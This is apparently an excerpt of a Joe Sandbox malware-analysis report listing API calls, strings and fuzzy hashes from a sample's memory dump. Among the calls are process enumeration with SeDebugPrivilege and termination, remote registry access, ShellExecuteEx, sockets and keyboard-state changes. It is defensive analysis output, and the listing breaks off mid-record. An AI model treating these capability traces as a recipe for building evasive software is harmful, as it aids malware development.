                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 007F745D
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F7477
                                                • _wcscat.LIBCMT ref: 007F74D2
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 007F74E9
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F7517
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
                                                • Instruction ID: f271f8ef8bc1472975a0a9aa3c3ccdaa37cae53d00aaadab30bf4a98ff196149
                                                • Opcode Fuzzy Hash: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
                                                • Instruction Fuzzy Hash: 0F41C370A0434CAFEB219F64CC85BFE77A9EF08350F10442AFA54E7291D6759D84DB60
                                                APIs
                                                  • Part of subcall function 007D4148: CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
                                                  • Part of subcall function 007D4148: Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
                                                  • Part of subcall function 007D4148: CloseHandle.KERNEL32(00000000), ref: 007D4245
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF08D
                                                • GetLastError.KERNEL32 ref: 007EF0A0
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF0CF
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 007EF14C
                                                • GetLastError.KERNEL32(00000000), ref: 007EF157
                                                • CloseHandle.KERNEL32(00000000), ref: 007EF18C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
                                                • Instruction ID: 8c240dee3e668bda4c5af0c0f04af8e0d087ba133ea34205e3bf6200ebc0299e
                                                • Opcode Fuzzy Hash: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
                                                • Instruction Fuzzy Hash: C0419A31301205DFDB25EF25CC99F6DB7A5AF88714F08841DF9469B292DB78A804CB96
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 007D357C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
                                                • Instruction ID: 289ce6bf725a244139e50981e13f8cd2be2cd188a72439f952d83cefa4a6f80b
                                                • Opcode Fuzzy Hash: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
                                                • Instruction Fuzzy Hash: 4D113D71649756FEEB004A34FC82D6A77BCEF05360B20001BF91196381E7AC7F5046A6
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007D4802
                                                • LoadStringW.USER32(00000000), ref: 007D4809
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007D481F
                                                • LoadStringW.USER32(00000000), ref: 007D4826
                                                • _wprintf.LIBCMT ref: 007D484C
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D486A
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 007D4847
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
                                                • Instruction ID: 8fc0ab0db6bb1e05cebd9b8b511c8e9658e10d7faa7dffa6fa9b888518631ab5
                                                • Opcode Fuzzy Hash: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
                                                • Instruction Fuzzy Hash: 7D012CF69003487BE75197A09D89FE7766CEB08300F400596B759E2141EA749E844F75
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FDB42
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FDB62
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007FDD9D
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007FDDBB
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007FDDDC
                                                • ShowWindow.USER32(00000003,00000000), ref: 007FDDFB
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007FDE20
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 007FDE43
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-0
                                                • Opcode ID: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
                                                • Instruction ID: c27f601372e5b31d8248f159a96ebbc5abc9a36e19aa032a0681035f86cc2496
                                                • Opcode Fuzzy Hash: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
                                                • Instruction Fuzzy Hash: E8B19C71600219EFDF24CF69C9897BD7BB2BF44701F088169EE489E255D739AD50CBA0
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F044E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharConnectRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3479070676-0
                                                • Opcode ID: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
                                                • Instruction ID: dd34bf8c5b18e8f72184cb7fd3c359d1cb03db42a2b2253fc9322018acc15c81
                                                • Opcode Fuzzy Hash: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
                                                • Instruction Fuzzy Hash: B0A14870204205DFCB20EF24C885B7EB7E5AF84314F14891DF6969B392DB39A955CF92
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 00772E9F
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000,000000FF), ref: 00772EE7
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC55B
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC5C7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
                                                • Instruction ID: c03f45f71f4f568d94fa82a84ff9c4dcc82bdb4abfe08221a52dcee99985cca6
                                                • Opcode Fuzzy Hash: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
                                                • Instruction Fuzzy Hash: 8941DB30604780AEDF764728888CB7A7B92BBD3340F28C51DF4AB46562C7BDE852DB15
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 007D7698
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007D76CF
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D76EB
                                                • _memmove.LIBCMT ref: 007D7739
                                                • _memmove.LIBCMT ref: 007D7756
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D7765
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007D777A
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D7799
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 256516436-0
                                                • Opcode ID: bce698f711907b78dbd0b9ffd088c9e1776112860c0935b28163c80f40abe254
                                                • Instruction ID: dc4ac910213afd3ef0e40e983d2bc4808ca3411ccaa925420397286992de07bc
                                                • Opcode Fuzzy Hash: bce698f711907b78dbd0b9ffd088c9e1776112860c0935b28163c80f40abe254
                                                • Instruction Fuzzy Hash: 5E315E71904209EFCF50EF64DC89EAEB778FF45710F1480A6F904AA256EB349A54DBA0
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 007F6810
                                                • GetDC.USER32(00000000), ref: 007F6818
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F6823
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007F682F
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F686B
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F687C
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F964F,?,?,000000FF,00000000,?,000000FF,?), ref: 007F68B6
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F68D6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
                                                • Instruction ID: bdd9496d4d2feb8075cc181b8853fdb19a9fe17d2f6eb6d32272f9c85fd697b1
                                                • Opcode Fuzzy Hash: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
                                                • Instruction Fuzzy Hash: 4A316B72101614BFEB118F14CC8AFEA3BAEFF49761F044065FE089A291D67A9851CBB0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
                                                • Instruction ID: 4fc1fdc9beda21869b0f43d2d57c285cb9ea978b3906c62ca27f1badaec21b8b
                                                • Opcode Fuzzy Hash: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
                                                • Instruction Fuzzy Hash: 9121DA73A45106BAE606B5105D46FAB375CEE21754F08402CFD0AE6382EB1CDE21C6A1
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                • _wcstok.LIBCMT ref: 007DF2D7
                                                • _wcscpy.LIBCMT ref: 007DF366
                                                • _memset.LIBCMT ref: 007DF399
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                • String ID: X
                                                • API String ID: 774024439-3081909835
                                                • Opcode ID: 1a4caf28fbef0ab87f5152433f12106387406dc912d4d8fc2bcba20862f0062a
                                                • Instruction ID: efc896a5d4a852f1cf381eec0b5cedd94cc120a723a34d56e0c2ce8ff457dde6
                                                • Opcode Fuzzy Hash: 1a4caf28fbef0ab87f5152433f12106387406dc912d4d8fc2bcba20862f0062a
                                                • Instruction Fuzzy Hash: CCC17B71604341DFC714EF64D889A5AB7E4BF84350F40892EF89A973A2DB38EC45CB92
                                                APIs
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007E72EB
                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007E730C
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E731F
                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 007E73D5
                                                • inet_ntoa.WSOCK32(?), ref: 007E7392
                                                  • Part of subcall function 007CB4EA: _strlen.LIBCMT ref: 007CB4F4
                                                  • Part of subcall function 007CB4EA: _memmove.LIBCMT ref: 007CB516
                                                • _strlen.LIBCMT ref: 007E742F
                                                • _memmove.LIBCMT ref: 007E7498
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                • String ID:
                                                • API String ID: 3619996494-0
                                                • Opcode ID: 8d930f3f1e7ebc08627e312f83b6513c131ae58d58f5e37d719264d728baf731
                                                • Instruction ID: 01eee5dc44c8f22c097ac5d2e9d29f3b06dfb4d3598cc16d35a4b01777694ff9
                                                • Opcode Fuzzy Hash: 8d930f3f1e7ebc08627e312f83b6513c131ae58d58f5e37d719264d728baf731
                                                • Instruction Fuzzy Hash: 5E81C171108280EBC714EB25DC8AF6AB7E8EF89714F14851CF5559B2D2EB78DD01CBA2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
                                                • Instruction ID: b7810d50231ee6a3a497255a6c06b8f448abfce2818169a24ccfb830368a627c
                                                • Opcode Fuzzy Hash: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
                                                • Instruction Fuzzy Hash: CE714D30900209EFDF14CF58CC49AAEBB79FF86354F54C159F919AA251C738AA51CFA1
                                                APIs
                                                • IsWindow.USER32(00D85838), ref: 007FBA5D
                                                • IsWindowEnabled.USER32(00D85838), ref: 007FBA69
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007FBB4D
                                                • SendMessageW.USER32(00D85838,000000B0,?,?), ref: 007FBB84
                                                • IsDlgButtonChecked.USER32(?,?), ref: 007FBBC1
                                                • GetWindowLongW.USER32(00D85838,000000EC), ref: 007FBBE3
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007FBBFB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
                                                • Instruction ID: 9d16586557522b4c76ce05cdb2849b434e370735bad14a2d3c43c03c54fe353f
                                                • Opcode Fuzzy Hash: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
                                                • Instruction Fuzzy Hash: 2471BB74604208EFDB259F64C894FBABBB9FF49300F148059EB55973A1CB3AAC50DB60
                                                APIs
                                                • _memset.LIBCMT ref: 007EFB31
                                                • _memset.LIBCMT ref: 007EFBFA
                                                • ShellExecuteExW.SHELL32(?), ref: 007EFC3F
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                • GetProcessId.KERNEL32(00000000), ref: 007EFCB6
                                                • CloseHandle.KERNEL32(00000000), ref: 007EFCE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                • String ID: @
                                                • API String ID: 3522835683-2766056989
                                                • Opcode ID: 4f7efb11e20323b97ee875f75fa6250ddd053d9e56a40fffc7d615f4771648ab
                                                • Instruction ID: 06a7e01cdaf60fb48e4c9b1daa0b1623f4e17500bf871d460aceeaacc64aa3bd
                                                • Opcode Fuzzy Hash: 4f7efb11e20323b97ee875f75fa6250ddd053d9e56a40fffc7d615f4771648ab
                                                • Instruction Fuzzy Hash: 0A61CF74A00619DFCF14EFA5C4949AEB7F4FF48310F208469E84AAB761DB38AD41CB90
                                                APIs
                                                • GetParent.USER32(?), ref: 007D178B
                                                • GetKeyboardState.USER32(?), ref: 007D17A0
                                                • SetKeyboardState.USER32(?), ref: 007D1801
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 007D182F
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 007D184E
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 007D1894
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007D18B7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
                                                • Instruction ID: 10aeba9f3930c74aac90bc3280c5386607025231b06a7c17d7cc782e3d119de4
